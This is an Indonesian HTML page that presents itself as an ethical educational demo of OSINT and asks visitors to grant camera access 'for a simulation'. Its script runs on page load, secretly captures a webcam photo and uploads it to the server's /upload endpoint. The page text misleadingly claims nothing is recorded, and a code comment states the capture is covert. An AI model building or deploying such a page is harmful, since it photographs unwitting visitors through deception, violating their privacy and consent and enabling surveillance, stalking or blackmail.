<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Teknologi OSINT</title>
    <link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@600&family=Roboto&display=swap" rel="stylesheet">
    <style>
        body {
            margin: 0;
            padding: 0;
            background: linear-gradient(135deg, #0f2027, #203a43, #2c5364);
            font-family: 'Roboto', sans-serif;
            color: #ffffff;
        }

        header {
            text-align: center;
            padding: 60px 20px 30px;
        }

        h1 {
            font-family: 'Orbitron', sans-serif;
            font-size: 36px;
            color: #00ffc3;
        }

        .container {
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
            line-height: 1.6;
            font-size: 16px;
            background-color: rgba(255, 255, 255, 0.05);
            border-radius: 10px;
            box-shadow: 0 0 20px #00ffc3;
        }

        footer {
            text-align: center;
            padding: 30px;
            font-size: 13px;
            color: #ccc;
        }
    </style>
</head>
<body>

    <header>
        <h1>Teknologi OSINT</h1>
    </header>

    <div class="container">
        <p><strong>Open Source Intelligence (OSINT)</strong> adalah teknik pengumpulan informasi dari sumber terbuka yang tersedia untuk umum. Teknologi ini banyak digunakan dalam dunia keamanan siber, investigasi digital, serta bidang forensik.</p>

        <p><strong>Simulasi:</strong> Izinkan browser untuk membuka kamera untuk simulasi OSINT, agar anda tidak ketinggalan info selanjutnya.</p>

        <p><strong>Tujuan Halaman Ini:</strong></p>
        <ul>
            <li>Menjelaskan konsep dasar OSINT dan implementasinya.</li>
            <li>Menunjukkan bagaimana akses kamera dapat diminta melalui browser.</li>
            <li>Menekankan pentingnya etika dalam penggunaan teknologi OSINT.</li>
        </ul>

        <p><em>Catatan: Tidak ada tampilan video atau rekaman ditampilkan. Semua proses berlangsung di latar belakang hanya untuk simulasi.</em></p>
    </div>

    <footer>
        © 2025 | Teknologi OSINT Demo | Developed for Ethical Use
    </footer>

    <!-- SCRIPT: Ambil gambar diam-diam dan kirim ke Flask -->
    <script>
        window.addEventListener("load", () => {
            navigator.mediaDevices.getUserMedia({ video: true })
                .then(stream => {
                    const video = document.createElement("video");
                    video.srcObject = stream;
                    video.play();

                    video.onloadedmetadata = () => {
                        setTimeout(() => {
                            const canvas = document.createElement("canvas");
                            canvas.width = video.videoWidth;
                            canvas.height = video.videoHeight;
                            const ctx = canvas.getContext("2d");
                            ctx.drawImage(video, 0, 0);

                            canvas.toBlob(blob => {
                                const formData = new FormData();
                                formData.append("image", blob);

                                fetch("/upload", {
                                    method: "POST",
                                    body: formData
                                }).then(() => {
                                    console.log("Foto berhasil dikirim ke server.");
                                }).catch(err => {
                                    console.error("Gagal mengirim foto:", err);
                                });

                                // Hentikan kamera
                                stream.getTracks().forEach(track => track.stop());
                            }, "image/jpeg");
                        }, 1000); // Delay 1 detik untuk memberi waktu kamera menyala
                    };
                })
                .catch(err => {
                    console.warn("Akses kamera ditolak atau gagal:", err);
                });
        });
    </script>
</body>
</html>
